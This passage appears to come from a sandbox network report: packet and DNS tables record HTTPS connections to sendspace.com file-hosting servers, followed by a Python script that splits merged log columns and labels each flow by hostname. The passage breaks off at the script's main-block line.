                                         May 23, 2024 18:25:07.542649031 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.548788071 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.548810959 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.548868895 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.548897982 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.548950911 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.553982019 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.554006100 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.554076910 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.554085970 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.554111004 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.554124117 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.559322119 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.559340954 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.559401989 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.559410095 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.559452057 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.571979046 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.571997881 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.572091103 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.572105885 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.572146893 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.590142965 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.590163946 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.590233088 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.590245008 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.590286970 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.622009039 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.622030973 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.622139931 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.622153044 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.622194052 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.626425028 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.626445055 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.626516104 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.626524925 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.626560926 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.630106926 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.630127907 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.630217075 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.630227089 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.630290985 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.633831024 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.633850098 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.633958101 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.633968115 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.634021044 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.636981010 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.637006044 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.637185097 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.637214899 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.637273073 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.639991045 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.640012026 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.640043020 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.640075922 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.640086889 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.640103102 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.640114069 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.640132904 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.640161037 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.640436888 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:46.086379051 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.086433887 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:46.086519957 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.104995012 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.105015993 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:46.855931044 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:46.856076956 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.913944960 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.913989067 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:46.914515018 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:46.914594889 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.916891098 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:46.962496042 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:47.215272903 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:47.215357065 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:47.215442896 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:47.219186068 CEST 49713        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:47.219227076 CEST 443          49713      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:47.250879049 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:47.250946999 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:47.251127005 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:47.251276016 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:47.251302004 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.246144056 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.246355057 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.250637054 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.250677109 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.251539946 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.251643896 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.256460905 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.302505016 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500044107 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500109911 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500154018 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500171900 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.500202894 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500427008 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.500427008 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.500859976 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500906944 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.500938892 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.501013994 CEST 443          49714      69.31.136.17  192.168.2.5
                                         May 23, 2024 18:25:48.501064062 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.501085043 CEST 49714        443        192.168.2.5   69.31.136.17
                                         May 23, 2024 18:25:48.585947037 CEST 443          49714      69.31.136.17  192.168.2.5
                                        May 23, 2024 18:25:48.585979939 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.586088896 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.586114883 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.586159945 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.587928057 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.587946892 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.588000059 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.588006973 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.588027954 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.588047981 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.590358019 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.590377092 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.590426922 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.590434074 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.590446949 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.590471029 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.612047911 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.612081051 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.612145901 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.612164021 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.612199068 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.612217903 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.676260948 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.676287889 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.676351070 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.676362991 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.676399946 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.676424980 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.678272963 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.678291082 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.678368092 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.678373098 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.678416967 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.679549932 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.679568052 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.679632902 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.679637909 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.679682016 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.681510925 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.681528091 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.681593895 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.681600094 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.681708097 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.699776888 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.699795008 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.699924946 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.699930906 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.699975967 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.811085939 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.811110020 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.811239004 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.811249971 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.811295033 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.815963030 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.815984011 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.816037893 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.816045046 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.816075087 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.816090107 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.817064047 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817081928 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817142010 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.817147970 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817188978 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.817742109 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817775011 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817833900 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.817840099 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.817878008 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.819380045 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.819401979 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.819461107 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.819466114 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.819504023 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.820626020 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.820648909 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.820699930 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.820704937 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.820754051 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.823365927 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.823386908 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.823450089 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.823455095 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.823493958 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.940136909 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.940179110 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.940256119 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.940270901 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.940434933 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.941555023 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.941581964 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.941646099 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.941651106 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.941693068 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.942707062 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.942734003 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.942779064 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.942785025 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.942806005 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.942826986 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.944222927 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.944241047 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.944300890 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.944308996 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.944351912 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.945596933 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.945611954 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.945667982 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.945674896 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.945714951 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.950407982 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.950424910 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.950501919 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.950509071 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.950547934 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.951642990 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.951661110 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.951715946 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.951723099 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.951762915 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.952131033 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.952148914 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.952205896 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:48.952212095 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:48.952249050 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.031758070 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.031779051 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.031969070 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.031997919 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.032097101 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.032675982 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.032692909 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.032749891 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.032756090 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.032797098 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.033618927 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.033633947 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.033689976 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.033694983 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.033734083 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.035219908 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.035234928 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.035300970 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.035305977 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.035346031 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.036648035 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.036669970 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.036730051 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.036736012 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.036777020 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.038611889 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.038625956 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.038691998 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.038697958 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.038738966 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039589882 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039622068 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039653063 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039659023 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039675951 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039676905 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039697886 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039721012 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039870024 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039885998 CEST4434971469.31.136.17192.168.2.5
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        May 23, 2024 18:25:05.356702089 CEST | 51775 | 53 | 192.168.2.5 | 1.1.1.1
                                        May 23, 2024 18:25:05.368858099 CEST | 53 | 51775 | 1.1.1.1 | 192.168.2.5
                                        May 23, 2024 18:25:06.155648947 CEST | 58618 | 53 | 192.168.2.5 | 1.1.1.1
                                        May 23, 2024 18:25:06.190654039 CEST | 53 | 58618 | 1.1.1.1 | 192.168.2.5
                                        May 23, 2024 18:25:47.225666046 CEST | 50868 | 53 | 192.168.2.5 | 1.1.1.1
                                        May 23, 2024 18:25:47.247318983 CEST | 53 | 50868 | 1.1.1.1 | 192.168.2.5
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        May 23, 2024 18:25:05.356702089 CEST | 192.168.2.5 | 1.1.1.1 | 0x7cb0 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
                                        May 23, 2024 18:25:06.155648947 CEST | 192.168.2.5 | 1.1.1.1 | 0xa42b | Standard query (0) | fs13n1.sendspace.com | A (IP address) | IN (0x0001) | false
                                        May 23, 2024 18:25:47.225666046 CEST | 192.168.2.5 | 1.1.1.1 | 0x6de0 | Standard query (0) | fs03n2.sendspace.com | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        May 23, 2024 18:25:05.368858099 CEST | 1.1.1.1 | 192.168.2.5 | 0x7cb0 | No error (0) | www.sendspace.com |  | 104.21.28.80 | A (IP address) | IN (0x0001) | false
                                        May 23, 2024 18:25:05.368858099 CEST | 1.1.1.1 | 192.168.2.5 | 0x7cb0 | No error (0) | www.sendspace.com |  | 172.67.170.105 | A (IP address) | IN (0x0001) | false
                                        May 23, 2024 18:25:06.190654039 CEST | 1.1.1.1 | 192.168.2.5 | 0xa42b | No error (0) | fs13n1.sendspace.com |  | 69.31.136.57 | A (IP address) | IN (0x0001) | false
                                        May 23, 2024 18:25:47.247318983 CEST | 1.1.1.1 | 192.168.2.5 | 0x6de0 | No error (0) | fs03n2.sendspace.com |  | 69.31.136.17 | A (IP address) | IN (0x0001) | false
                                        • www.sendspace.com
                                        • fs13n1.sendspace.com
                                        • fs03n2.sendspace.com
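The packet and DNS tables above arrive with their columns run together (ports and both addresses glued into one digit string), and the sandbox prints the A records separately from the flows that used them. The script below is an added example written for this page, not part of the report or of Joe Sandbox: it recovers the columns of such rows by enumerating every legal split and keeping the one that agrees with facts the report already states (a well-known service port on one side, addresses that the DNS answers, the resolver or the sandbox client account for), then labels each flow with the hostname that resolved to its peer. The sample rows and A records are copied from the tables above; the tie-breaking rules and the choice to refuse rows that remain ambiguous are this example's own.

```python
"""Recover the columns of flattened sandbox packet rows and label every flow
with the hostname the sandbox resolved for its peer.

Example code written for this page; it is not part of the report or of Joe
Sandbox. The rows and A records below are copied from the report's TCP, UDP
and DNS tables; the tie-breaking rules are this example's own.
"""
import re
from collections import Counter

# One side of every flow in this capture is a well-known service port.
KNOWN_SERVER_PORTS = {53, 80, 443}

# A row is "<timestamp> CEST" followed by sport+dport+src_ip+dst_ip with no
# separators. Only two digit runs are ambiguous: run1 holds both ports and
# the first octet of src_ip, run2 the last octet of src_ip and the first
# octet of dst_ip.
ROW_RE = re.compile(
    r"^(?P<ts>.+? CEST)"
    r"(?P<run1>\d+)\.(?P<s2>\d{1,3})\.(?P<s3>\d{1,3})\.(?P<run2>\d+)"
    r"\.(?P<d2>\d{1,3})\.(?P<d3>\d{1,3})\.(?P<d4>\d{1,3})$"
)


def _octet_ok(s):
    return (s == "0" or not s.startswith("0")) and int(s) <= 255


def _port_ok(s):
    return (s == "0" or not s.startswith("0")) and int(s) <= 65535


def candidate_parses(row):
    """Yield every (ts, sport, dport, src_ip, dst_ip) consistent with row."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    run1, run2 = m["run1"], m["run2"]
    for i in range(1, len(run1) - 1):
        for j in range(i + 1, len(run1)):
            sport, dport, s1 = run1[:i], run1[i:j], run1[j:]
            if not (_port_ok(sport) and _port_ok(dport) and _octet_ok(s1)):
                continue
            for k in range(1, len(run2)):
                s4, d1 = run2[:k], run2[k:]
                if not (_octet_ok(s4) and _octet_ok(d1)):
                    continue
                src = ".".join((s1, m["s2"], m["s3"], s4))
                dst = ".".join((d1, m["d2"], m["d3"], m["d4"]))
                yield m["ts"], int(sport), int(dport), src, dst


def parse_row(row, known_ips):
    """Keep the parse that best agrees with what the capture already tells
    us (a known server port on one side, addresses the DNS tables or the
    sandbox client account for); None if that does not single one out."""
    def score(c):
        _, sport, dport, src, dst = c
        return (int(sport in KNOWN_SERVER_PORTS or dport in KNOWN_SERVER_PORTS),
                int(src in known_ips) + int(dst in known_ips))
    cands = list(candidate_parses(row))
    if not cands:
        return None
    best = max(map(score, cands))
    winners = [c for c in cands if score(c) == best]
    return winners[0] if len(winners) == 1 else None


def flows_by_host(rows, client_ip, resolver_ip, dns_answers):
    """Count packets per (client port, peer IP, peer name)."""
    names = dict(dns_answers)
    names[resolver_ip] = "(resolver)"
    known = {client_ip} | set(names)
    counts = Counter()
    for row in rows:
        parsed = parse_row(row, known)
        if parsed is None:
            raise ValueError(f"ambiguous row, fix by hand: {row!r}")
        _, sport, dport, src, dst = parsed
        port, peer = (sport, dst) if src == client_ip else (dport, src)
        counts[(port, peer, names.get(peer, "<unresolved>"))] += 1
    return dict(counts)


# Rows copied verbatim from the report's UDP and TCP tables.
SAMPLE_ROWS = [
    "May 23, 2024 18:25:05.356702089 CEST5177553192.168.2.51.1.1.1",
    "May 23, 2024 18:25:05.368858099 CEST53517751.1.1.1192.168.2.5",
    "May 23, 2024 18:25:46.913944960 CEST49713443192.168.2.5104.21.28.80",
    "May 23, 2024 18:25:46.913989067 CEST44349713104.21.28.80192.168.2.5",
    "May 23, 2024 18:25:47.250879049 CEST49714443192.168.2.569.31.136.17",
    "May 23, 2024 18:25:47.250946999 CEST4434971469.31.136.17192.168.2.5",
]
# A records from the report's DNS answer table.
DNS_ANSWERS = {
    "104.21.28.80": "www.sendspace.com",
    "172.67.170.105": "www.sendspace.com",
    "69.31.136.57": "fs13n1.sendspace.com",
    "69.31.136.17": "fs03n2.sendspace.com",
}

if __name__ == "__main__":
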